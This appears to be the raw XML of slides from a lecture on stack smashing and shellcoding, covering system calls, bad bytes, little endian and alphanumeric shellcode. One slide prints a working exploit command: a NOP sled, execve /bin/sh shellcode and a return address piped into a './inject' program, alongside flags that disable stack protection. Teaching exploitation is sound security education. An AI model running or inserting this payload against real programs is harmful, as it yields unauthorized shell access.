                  <a:pt x="0" y="2677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53885" y="5586557"/>
            <a:ext cx="1508760" cy="267970"/>
          </a:xfrm>
          <a:custGeom>
            <a:avLst/>
            <a:gdLst/>
            <a:ahLst/>
            <a:cxnLst/>
            <a:rect l="l" t="t" r="r" b="b"/>
            <a:pathLst>
              <a:path w="1508760" h="267970">
                <a:moveTo>
                  <a:pt x="0" y="0"/>
                </a:moveTo>
                <a:lnTo>
                  <a:pt x="1508223" y="0"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="1508223" y="267737"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="0" y="2677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2106" y="5586557"/>
            <a:ext cx="502920" cy="267970"/>
          </a:xfrm>
          <a:custGeom>
            <a:avLst/>
            <a:gdLst/>
            <a:ahLst/>
            <a:cxnLst/>
            <a:rect l="l" t="t" r="r" b="b"/>
            <a:pathLst>
              <a:path w="502920" h="267970">
                <a:moveTo>
                  <a:pt x="0" y="0"/>
                </a:moveTo>
                <a:lnTo>
                  <a:pt x="502737" y="0"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="502737" y="267737"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="0" y="2677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11173" y="4957944"/>
          <a:ext cx="4086223" cy="857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4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461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90 90 90 90 90 90 90 90</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr sz="1800" spc="-6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4">
                <a:tc>
                  <a:txBody>
                    <a:bodyPr/>
                    <a:lstStyle/>
                    <a:p>
                      <a:pPr marR="22860" algn="ctr">
                        <a:lnSpc>
                          <a:spcPts val="203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203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90 90 90 90 90 90 90 90</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr sz="1800" spc="-6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1">
                <a:tc>
                  <a:txBody>
                    <a:bodyPr/>
                    <a:lstStyle/>
                    <a:p>
                      <a:pPr marR="22860" algn="ctr">
                        <a:lnSpc>
                          <a:spcPts val="203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5"/>
                        </a:lnSpc>
                      </a:pP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35"/>
                        </a:lnSpc>
                      </a:pPr>
                      <a:r>
                        <a:rPr sz="18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shellcode </a:t>
                      </a:r>
                      <a:r>
                        <a:rPr sz="18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90 90 90 90</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr sz="1800" spc="-30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addr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070758" y="842574"/>
            <a:ext cx="5073203" cy="5726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D783456E-38C2-4E99-9D10-5E53A3BD6BE7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202155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33769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Solving</a:t>
            </a:r>
            <a:r>
              <a:rPr spc="-90" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr spc="-5" dirty="0"/>
              <a:t>./inject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0223" y="1739261"/>
            <a:ext cx="8057515" cy="3229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An exploit for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./inject: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50" dirty="0">
              <a:latin typeface="Times New Roman"/>
              <a:cs typeface="Times New Roman"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr marL="12700" marR="5080">
              <a:lnSpc>
                <a:spcPct val="99300"/>
              </a:lnSpc>
            </a:pP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(python -c 'print </a:t>
            </a:r>
            <a:r>
              <a:rPr sz="2400" spc="-5" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FF9900"/>
                </a:solidFill>
                <a:latin typeface="Consolas"/>
                <a:cs typeface="Consolas"/>
              </a:rPr>
              <a:t>"\x90"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*80 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+  </a:t>
            </a:r>
            <a:r>
              <a:rPr sz="2400" spc="-5" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="92D050"/>
                </a:solidFill>
                <a:latin typeface="Consolas"/>
                <a:cs typeface="Consolas"/>
              </a:rPr>
              <a:t>"\x31\xc0\x50\x68\x2f\x2f\x73\x68\x68\x2f\x62\x6  9\x6e\x89\xe3\x89\xc1\x89\xc2\xb0\x0b\xcd\x80\x3  1\xc0\x40\xcd\x80" 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+ </a:t>
            </a:r>
            <a:r>
              <a:rPr sz="2400" spc="-5" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FF9900"/>
                </a:solidFill>
                <a:latin typeface="Consolas"/>
                <a:cs typeface="Consolas"/>
              </a:rPr>
              <a:t>"\x90"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*32 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+  </a:t>
            </a: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"\x30\xf6\xff\xbf"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'; cat;) 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|</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="24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./inject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6581DF0-6CE9-41DC-BFC9-8CA0FA07D4EB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655713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3765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Party </a:t>
            </a:r>
            <a:r>
              <a:rPr spc="-5" dirty="0"/>
              <a:t>like </a:t>
            </a:r>
            <a:r>
              <a:rPr spc="-10" dirty="0"/>
              <a:t>It’s</a:t>
            </a:r>
            <a:r>
              <a:rPr spc="-85" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr spc="-5" dirty="0"/>
              <a:t>‘99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9068" y="1739261"/>
            <a:ext cx="763460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indent="-418465">
              <a:lnSpc>
                <a:spcPct val="100000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="100"/>
              </a:spcBef>
              <a:buChar char="•"/>
              <a:tabLst>
                <a:tab pos="430530" algn="l"/>
                <a:tab pos="431165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gcc</a:t>
            </a:r>
            <a:endParaRPr sz="3000" dirty="0">
              <a:latin typeface="Calibri"/>
              <a:cs typeface="Calibri"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr marL="887730" lvl="1" indent="-419100">
              <a:lnSpc>
                <a:spcPct val="100000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="35"/>
              </a:spcBef>
              <a:buChar char="•"/>
              <a:tabLst>
                <a:tab pos="887730" algn="l"/>
                <a:tab pos="888365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-z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execstack</a:t>
            </a:r>
            <a:endParaRPr sz="3000" dirty="0">
              <a:latin typeface="Calibri"/>
              <a:cs typeface="Calibri"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr marL="887730" lvl="1" indent="-419100">
              <a:lnSpc>
                <a:spcPct val="100000"/>
              </a:lnSpc>
              <a:buChar char="•"/>
              <a:tabLst>
                <a:tab pos="887730" algn="l"/>
                <a:tab pos="888365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3000" spc="-5" dirty="0" err="1">
                <a:solidFill>
                  <a:srgbClr val="FFFFFF"/>
                </a:solidFill>
                <a:latin typeface="Calibri"/>
                <a:cs typeface="Calibri"/>
              </a:rPr>
              <a:t>fno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-stack-protector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F7F3485-B0E3-44D0-9849-2FC983D06076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885558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9448" y="450652"/>
            <a:ext cx="40043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MY" sz="4800" spc="-5" dirty="0" err="1"/>
              <a:t>Shellcoding</a:t>
            </a:r>
            <a:endParaRPr sz="4800" spc="-5" dirty="0"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EFF46564-AC6F-4E45-ADA1-02D67B014E81}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="228600" y="5633469"/>
            <a:ext cx="3886200" cy="304267"/>
          </a:xfrm>
          <a:custGeom>
            <a:avLst/>
            <a:gdLst/>
            <a:ahLst/>
            <a:cxnLst/>
            <a:rect l="l" t="t" r="r" b="b"/>
            <a:pathLst>
              <a:path w="3222625" h="279400">
                <a:moveTo>
                  <a:pt x="0" y="0"/>
                </a:moveTo>
                <a:lnTo>
                  <a:pt x="3222386" y="0"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="3222386" y="279053"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="0" y="27905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9539" y="1739261"/>
            <a:ext cx="4994275" cy="42355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 indent="-518159">
              <a:lnSpc>
                <a:spcPct val="200000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="100"/>
              </a:spcBef>
              <a:buAutoNum type="arabicPeriod"/>
              <a:tabLst>
                <a:tab pos="530225" algn="l"/>
                <a:tab pos="530860" algn="l"/>
              </a:tabLst>
            </a:pPr>
            <a:r>
              <a:rPr sz="2000" strike="sngStrike" spc="-10" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="666666"/>
                </a:solidFill>
                <a:latin typeface="Calibri"/>
                <a:cs typeface="Calibri"/>
              </a:rPr>
              <a:t>Basic </a:t>
            </a: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Stack Smashing</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="2000" strike="sngStrike" spc="-8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Review</a:t>
            </a:r>
            <a:endParaRPr sz="2000" strike="sngStrike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spcBef>
                <a:spcPts val="35"/>
              </a:spcBef>
              <a:buAutoNum type="arabicPeriod"/>
              <a:tabLst>
                <a:tab pos="530225" algn="l"/>
                <a:tab pos="530860" algn="l"/>
              </a:tabLst>
            </a:pP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Defining</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="2000" strike="sngStrike" spc="-1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Shellcode</a:t>
            </a:r>
            <a:endParaRPr sz="2000" strike="sngStrike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Hello World</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="2000" strike="sngStrike" spc="-2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Shellcode</a:t>
            </a:r>
            <a:endParaRPr sz="2000" strike="sngStrike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Linux System</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="2000" strike="sngStrike" spc="-15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Calls</a:t>
            </a:r>
            <a:endParaRPr sz="2000" strike="sngStrike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Writing </a:t>
            </a:r>
            <a:r>
              <a:rPr sz="2000" strike="sngStrike" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="666666"/>
                </a:solidFill>
                <a:latin typeface="Calibri"/>
                <a:cs typeface="Calibri"/>
              </a:rPr>
              <a:t>&amp; </a:t>
            </a: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Testing</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="2000" strike="sngStrike" spc="-65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Shellcode</a:t>
            </a:r>
            <a:endParaRPr sz="2000" strike="sngStrike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trike="sngStrike" spc="-10" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="666666"/>
                </a:solidFill>
                <a:latin typeface="Calibri"/>
                <a:cs typeface="Calibri"/>
              </a:rPr>
              <a:t>Injecting</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="2000" strike="sngStrike" spc="-15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Shellcode</a:t>
            </a:r>
            <a:endParaRPr sz="2000" strike="sngStrike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Additional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Notes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3990BF6D-D20C-4421-A335-2FB7B0C8338F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73917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47123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</a:t>
            </a:r>
            <a:r>
              <a:rPr spc="-90" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr spc="-5" dirty="0"/>
              <a:t>Constraints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019" y="1742309"/>
            <a:ext cx="7673975" cy="334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3810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Calibri"/>
              <a:buChar char="•"/>
              <a:tabLst>
                <a:tab pos="392430" algn="l"/>
                <a:tab pos="393700" algn="l"/>
              </a:tabLst>
            </a:pPr>
            <a:r>
              <a:rPr sz="2400" spc="-5" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FFFF00"/>
                </a:solidFill>
                <a:latin typeface="Consolas"/>
                <a:cs typeface="Consolas"/>
              </a:rPr>
              <a:t>fgets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()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reads stdin until input length, </a:t>
            </a:r>
            <a:r>
              <a:rPr sz="2400" spc="-5" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FFFF00"/>
                </a:solidFill>
                <a:latin typeface="Consolas"/>
                <a:cs typeface="Consolas"/>
              </a:rPr>
              <a:t>scanf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()</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="2400" spc="-7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93065">
              <a:lnSpc>
                <a:spcPts val="2875"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="5"/>
              </a:spcBef>
            </a:pPr>
            <a:r>
              <a:rPr sz="2400" spc="-5" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FFFF00"/>
                </a:solidFill>
                <a:latin typeface="Consolas"/>
                <a:cs typeface="Consolas"/>
              </a:rPr>
              <a:t>gets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()</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="2400" spc="-7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read until terminating character</a:t>
            </a:r>
            <a:endParaRPr sz="2400">
              <a:latin typeface="Calibri"/>
              <a:cs typeface="Calibri"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr marL="850265" lvl="1" indent="-356235">
              <a:lnSpc>
                <a:spcPts val="2395"/>
              </a:lnSpc>
              <a:buChar char="•"/>
              <a:tabLst>
                <a:tab pos="850265" algn="l"/>
                <a:tab pos="8509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rare to see gets or ‘insecure’ functions used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nowadays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FFFFFF"/>
              </a:buClr>
              <a:buFont typeface="Calibri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Calibri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Calibri"/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\x00</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="2400" spc="-79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(NULL) byte stops most string functions</a:t>
            </a:r>
            <a:endParaRPr sz="2400">
              <a:latin typeface="Calibri"/>
              <a:cs typeface="Calibri"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr marL="850265" indent="-396875">
              <a:lnSpc>
                <a:spcPct val="100000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="405"/>
              </a:spcBef>
              <a:buClr>
                <a:srgbClr val="FFFFFF"/>
              </a:buClr>
              <a:buSzPct val="120000"/>
              <a:buChar char="•"/>
              <a:tabLst>
                <a:tab pos="850900" algn="l"/>
              </a:tabLst>
            </a:pPr>
            <a:r>
              <a:rPr sz="2000" spc="-5" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FFFF00"/>
                </a:solidFill>
                <a:latin typeface="Consolas"/>
                <a:cs typeface="Consolas"/>
              </a:rPr>
              <a:t>strcpy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(), </a:t>
            </a:r>
            <a:r>
              <a:rPr sz="2000" spc="-5" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FFFF00"/>
                </a:solidFill>
                <a:latin typeface="Consolas"/>
                <a:cs typeface="Consolas"/>
              </a:rPr>
              <a:t>strlen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(), </a:t>
            </a:r>
            <a:r>
              <a:rPr sz="2000" spc="-5" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FFFF00"/>
                </a:solidFill>
                <a:latin typeface="Consolas"/>
                <a:cs typeface="Consolas"/>
              </a:rPr>
              <a:t>strcat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(), </a:t>
            </a:r>
            <a:r>
              <a:rPr sz="2000" spc="-5" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FFFF00"/>
                </a:solidFill>
                <a:latin typeface="Consolas"/>
                <a:cs typeface="Consolas"/>
              </a:rPr>
              <a:t>strcmp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() ...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393065" indent="-381000">
              <a:lnSpc>
                <a:spcPts val="2875"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="5"/>
              </a:spcBef>
              <a:buClr>
                <a:srgbClr val="FFFFFF"/>
              </a:buClr>
              <a:buFont typeface="Calibri"/>
              <a:buChar char="•"/>
              <a:tabLst>
                <a:tab pos="392430" algn="l"/>
                <a:tab pos="393700" algn="l"/>
              </a:tabLst>
            </a:pP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\x0A</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="2400" spc="-77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newline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) byte causes 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gets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(), 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fgets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() to stop reading</a:t>
            </a:r>
            <a:endParaRPr sz="2400">
              <a:latin typeface="Calibri"/>
              <a:cs typeface="Calibri"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr marL="850265" lvl="1" indent="-356235">
              <a:lnSpc>
                <a:spcPts val="2395"/>
              </a:lnSpc>
              <a:buChar char="•"/>
              <a:tabLst>
                <a:tab pos="850265" algn="l"/>
                <a:tab pos="8509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But not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NULLs!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C567EEF7-299E-461C-93F8-D02D32DDE4BF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1526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2841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Little</a:t>
            </a:r>
            <a:r>
              <a:rPr spc="-90" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr spc="-5" dirty="0"/>
              <a:t>Endian</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="5" name="object 5"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="542923" y="2380210"/>
            <a:ext cx="3963670" cy="310515"/>
          </a:xfrm>
          <a:custGeom>
            <a:avLst/>
            <a:gdLst/>
            <a:ahLst/>
            <a:cxnLst/>
            <a:rect l="l" t="t" r="r" b="b"/>
            <a:pathLst>
              <a:path w="3963670" h="310514">
                <a:moveTo>
                  <a:pt x="0" y="0"/>
                </a:moveTo>
                <a:lnTo>
                  <a:pt x="3963096" y="0"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="3963096" y="310009"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="0" y="3100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122" y="2837409"/>
            <a:ext cx="1391285" cy="310515"/>
          </a:xfrm>
          <a:custGeom>
            <a:avLst/>
            <a:gdLst/>
            <a:ahLst/>
            <a:cxnLst/>
            <a:rect l="l" t="t" r="r" b="b"/>
            <a:pathLst>
              <a:path w="1391285" h="310514">
                <a:moveTo>
                  <a:pt x="0" y="0"/>
                </a:moveTo>
                <a:lnTo>
                  <a:pt x="1390751" y="0"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="1390751" y="310009"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="0" y="3100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0872" y="2839343"/>
            <a:ext cx="2513330" cy="297815"/>
          </a:xfrm>
          <a:custGeom>
            <a:avLst/>
            <a:gdLst/>
            <a:ahLst/>
            <a:cxnLst/>
            <a:rect l="l" t="t" r="r" b="b"/>
            <a:pathLst>
              <a:path w="2513329" h="297814">
                <a:moveTo>
                  <a:pt x="0" y="0"/>
                </a:moveTo>
                <a:lnTo>
                  <a:pt x="2512718" y="0"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="2512718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3591" y="2837409"/>
            <a:ext cx="134620" cy="310515"/>
          </a:xfrm>
          <a:custGeom>
            <a:avLst/>
            <a:gdLst/>
            <a:ahLst/>
            <a:cxnLst/>
            <a:rect l="l" t="t" r="r" b="b"/>
            <a:pathLst>
              <a:path w="134620" h="310514">
                <a:moveTo>
                  <a:pt x="0" y="0"/>
                </a:moveTo>
                <a:lnTo>
                  <a:pt x="134387" y="0"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="134387" y="310009"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="0" y="3100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37980" y="2837409"/>
            <a:ext cx="577215" cy="310515"/>
          </a:xfrm>
          <a:custGeom>
            <a:avLst/>
            <a:gdLst/>
            <a:ahLst/>
            <a:cxnLst/>
            <a:rect l="l" t="t" r="r" b="b"/>
            <a:pathLst>
              <a:path w="577214" h="310514">
                <a:moveTo>
                  <a:pt x="0" y="0"/>
                </a:moveTo>
                <a:lnTo>
                  <a:pt x="576604" y="0"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="576604" y="310009"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="0" y="3100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3081" y="2837409"/>
            <a:ext cx="0" cy="310515"/>
          </a:xfrm>
          <a:custGeom>
            <a:avLst/>
            <a:gdLst/>
            <a:ahLst/>
            <a:cxnLst/>
            <a:rect l="l" t="t" r="r" b="b"/>
            <a:pathLst>
              <a:path h="310514">
                <a:moveTo>
                  <a:pt x="0" y="0"/>
                </a:moveTo>
                <a:lnTo>
                  <a:pt x="0" y="310009"/>
                </a:lnTo>
              </a:path>
            </a:pathLst>
          </a:custGeom>
          <a:ln w="76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0122" y="3294608"/>
            <a:ext cx="1432560" cy="310515"/>
          </a:xfrm>
          <a:custGeom>
            <a:avLst/>
            <a:gdLst/>
            <a:ahLst/>
            <a:cxnLst/>
            <a:rect l="l" t="t" r="r" b="b"/>
            <a:pathLst>
              <a:path w="1432560" h="310514">
                <a:moveTo>
                  <a:pt x="0" y="0"/>
                </a:moveTo>
                <a:lnTo>
                  <a:pt x="1432528" y="0"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="1432528" y="310009"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="0" y="3100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2651" y="3296542"/>
            <a:ext cx="2513330" cy="297815"/>
          </a:xfrm>
          <a:custGeom>
            <a:avLst/>
            <a:gdLst/>
            <a:ahLst/>
            <a:cxnLst/>
            <a:rect l="l" t="t" r="r" b="b"/>
            <a:pathLst>
              <a:path w="2513329" h="297814">
                <a:moveTo>
                  <a:pt x="0" y="0"/>
                </a:moveTo>
                <a:lnTo>
                  <a:pt x="2512718" y="0"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="2512718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45371" y="3294608"/>
            <a:ext cx="134620" cy="310515"/>
          </a:xfrm>
          <a:custGeom>
            <a:avLst/>
            <a:gdLst/>
            <a:ahLst/>
            <a:cxnLst/>
            <a:rect l="l" t="t" r="r" b="b"/>
            <a:pathLst>
              <a:path w="134620" h="310514">
                <a:moveTo>
                  <a:pt x="0" y="0"/>
                </a:moveTo>
                <a:lnTo>
                  <a:pt x="134387" y="0"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="134387" y="310009"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="0" y="3100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79759" y="3294608"/>
            <a:ext cx="577215" cy="310515"/>
          </a:xfrm>
          <a:custGeom>
            <a:avLst/>
            <a:gdLst/>
            <a:ahLst/>
            <a:cxnLst/>
            <a:rect l="l" t="t" r="r" b="b"/>
            <a:pathLst>
              <a:path w="577214" h="310514">
                <a:moveTo>
                  <a:pt x="0" y="0"/>
                </a:moveTo>
                <a:lnTo>
                  <a:pt x="576604" y="0"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="576604" y="310009"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="0" y="3100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94862" y="3294608"/>
            <a:ext cx="0" cy="310515"/>
          </a:xfrm>
          <a:custGeom>
            <a:avLst/>
            <a:gdLst/>
            <a:ahLst/>
            <a:cxnLst/>
            <a:rect l="l" t="t" r="r" b="b"/>
            <a:pathLst>
              <a:path h="310514">
                <a:moveTo>
                  <a:pt x="0" y="0"/>
                </a:moveTo>
                <a:lnTo>
                  <a:pt x="0" y="310009"/>
                </a:lnTo>
              </a:path>
            </a:pathLst>
          </a:custGeom>
          <a:ln w="76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2923" y="4209006"/>
            <a:ext cx="2655570" cy="310515"/>
          </a:xfrm>
          <a:custGeom>
            <a:avLst/>
            <a:gdLst/>
            <a:ahLst/>
            <a:cxnLst/>
            <a:rect l="l" t="t" r="r" b="b"/>
            <a:pathLst>
              <a:path w="2655570" h="310514">
                <a:moveTo>
                  <a:pt x="0" y="0"/>
                </a:moveTo>
                <a:lnTo>
                  <a:pt x="2655535" y="0"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="2655535" y="310009"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="0" y="3100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7322" y="4668140"/>
            <a:ext cx="1814830" cy="297815"/>
          </a:xfrm>
          <a:custGeom>
            <a:avLst/>
            <a:gdLst/>
            <a:ahLst/>
            <a:cxnLst/>
            <a:rect l="l" t="t" r="r" b="b"/>
            <a:pathLst>
              <a:path w="1814829" h="297814">
                <a:moveTo>
                  <a:pt x="0" y="0"/>
                </a:moveTo>
                <a:lnTo>
                  <a:pt x="1814746" y="0"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="1814746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2064" y="4668140"/>
            <a:ext cx="1396365" cy="297815"/>
          </a:xfrm>
          <a:custGeom>
            <a:avLst/>
            <a:gdLst/>
            <a:ahLst/>
            <a:cxnLst/>
            <a:rect l="l" t="t" r="r" b="b"/>
            <a:pathLst>
              <a:path w="1396364" h="297814">
                <a:moveTo>
                  <a:pt x="0" y="0"/>
                </a:moveTo>
                <a:lnTo>
                  <a:pt x="1395952" y="0"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="1395952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68019" y="4668140"/>
            <a:ext cx="139700" cy="297815"/>
          </a:xfrm>
          <a:custGeom>
            <a:avLst/>
            <a:gdLst/>
            <a:ahLst/>
            <a:cxnLst/>
            <a:rect l="l" t="t" r="r" b="b"/>
            <a:pathLst>
              <a:path w="139700" h="297814">
                <a:moveTo>
                  <a:pt x="0" y="0"/>
                </a:moveTo>
                <a:lnTo>
                  <a:pt x="139598" y="0"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="139598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1651" y="2188873"/>
            <a:ext cx="5215890" cy="2768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 memory, stuff is going in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backwards</a:t>
            </a:r>
            <a:endParaRPr sz="2000" dirty="0">
              <a:latin typeface="Calibri"/>
              <a:cs typeface="Calibri"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr marL="469265" marR="5080">
              <a:lnSpc>
                <a:spcPct val="15000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String Input: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“\x41\x42\x43\x44”</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="2000" spc="-66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ABCD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)  On the Stack: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“\x44\x43\x42\x41”</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="2000" spc="-68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DCBA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Target Address in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Python:</a:t>
            </a:r>
            <a:endParaRPr sz="2000" dirty="0">
              <a:latin typeface="Calibri"/>
              <a:cs typeface="Calibri"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr marR="3175" algn="ctr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pack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(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‘&lt;I’,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0xDDEEFFGG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00122" y="5123404"/>
            <a:ext cx="0" cy="310515"/>
          </a:xfrm>
          <a:custGeom>
            <a:avLst/>
            <a:gdLst/>
            <a:ahLst/>
            <a:cxnLst/>
            <a:rect l="l" t="t" r="r" b="b"/>
            <a:pathLst>
              <a:path h="310514">
                <a:moveTo>
                  <a:pt x="0" y="0"/>
                </a:moveTo>
                <a:lnTo>
                  <a:pt x="0" y="3100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8D96D61B-9EF2-4CDD-A106-61A51115A8E8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789887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2841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Little</a:t>
            </a:r>
            <a:r>
              <a:rPr spc="-90" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr spc="-5" dirty="0"/>
              <a:t>Endian</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="4" name="object 4"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="2681873" y="1627968"/>
            <a:ext cx="3780211" cy="4470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DB6E120-9ED2-47E7-B07E-75AA561E0D4E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5729300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5506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Alphanumeric</a:t>
            </a:r>
            <a:r>
              <a:rPr spc="-90" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr spc="-5" dirty="0"/>
              <a:t>Shellcode</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="5" name="object 5"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="812123" y="1869579"/>
            <a:ext cx="1064260" cy="372110"/>
          </a:xfrm>
          <a:custGeom>
            <a:avLst/>
            <a:gdLst/>
            <a:ahLst/>
            <a:cxnLst/>
            <a:rect l="l" t="t" r="r" b="b"/>
            <a:pathLst>
              <a:path w="1064260" h="372110">
                <a:moveTo>
                  <a:pt x="0" y="0"/>
                </a:moveTo>
                <a:lnTo>
                  <a:pt x="1063673" y="0"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="1063673" y="372074"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="0" y="3720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6577" y="1869579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49"/>
                </a:lnTo>
              </a:path>
            </a:pathLst>
          </a:custGeom>
          <a:ln w="81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9322" y="2231528"/>
            <a:ext cx="6402070" cy="372110"/>
          </a:xfrm>
          <a:custGeom>
            <a:avLst/>
            <a:gdLst/>
            <a:ahLst/>
            <a:cxnLst/>
            <a:rect l="l" t="t" r="r" b="b"/>
            <a:pathLst>
              <a:path w="6402070" h="372110">
                <a:moveTo>
                  <a:pt x="0" y="0"/>
                </a:moveTo>
                <a:lnTo>
                  <a:pt x="6401682" y="0"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="6401682" y="372074"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="0" y="3720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71002" y="2188517"/>
            <a:ext cx="304800" cy="350520"/>
          </a:xfrm>
          <a:custGeom>
            <a:avLst/>
            <a:gdLst/>
            <a:ahLst/>
            <a:cxnLst/>
            <a:rect l="l" t="t" r="r" b="b"/>
            <a:pathLst>
              <a:path w="304800" h="350519">
                <a:moveTo>
                  <a:pt x="0" y="0"/>
                </a:moveTo>
                <a:lnTo>
                  <a:pt x="304799" y="0"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="304799" y="350490"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="0" y="3504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9322" y="2593477"/>
            <a:ext cx="4612640" cy="372110"/>
          </a:xfrm>
          <a:custGeom>
            <a:avLst/>
            <a:gdLst/>
            <a:ahLst/>
            <a:cxnLst/>
            <a:rect l="l" t="t" r="r" b="b"/>
            <a:pathLst>
              <a:path w="4612640" h="372110">
                <a:moveTo>
                  <a:pt x="0" y="0"/>
                </a:moveTo>
                <a:lnTo>
                  <a:pt x="4612319" y="0"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="4612319" y="372074"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="0" y="3720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123" y="3317376"/>
            <a:ext cx="2242185" cy="361950"/>
          </a:xfrm>
          <a:custGeom>
            <a:avLst/>
            <a:gdLst/>
            <a:ahLst/>
            <a:cxnLst/>
            <a:rect l="l" t="t" r="r" b="b"/>
            <a:pathLst>
              <a:path w="2242185" h="361950">
                <a:moveTo>
                  <a:pt x="0" y="361949"/>
                </a:moveTo>
                <a:lnTo>
                  <a:pt x="2241647" y="361949"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="2241647" y="0"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="0" y="0"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="0" y="361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53767" y="3319609"/>
            <a:ext cx="1173480" cy="357505"/>
          </a:xfrm>
          <a:custGeom>
            <a:avLst/>
            <a:gdLst/>
            <a:ahLst/>
            <a:cxnLst/>
            <a:rect l="l" t="t" r="r" b="b"/>
            <a:pathLst>
              <a:path w="1173479" h="357504">
                <a:moveTo>
                  <a:pt x="0" y="0"/>
                </a:moveTo>
                <a:lnTo>
                  <a:pt x="1173058" y="0"/>
                </a:lnTo>
                <a:lnTo>
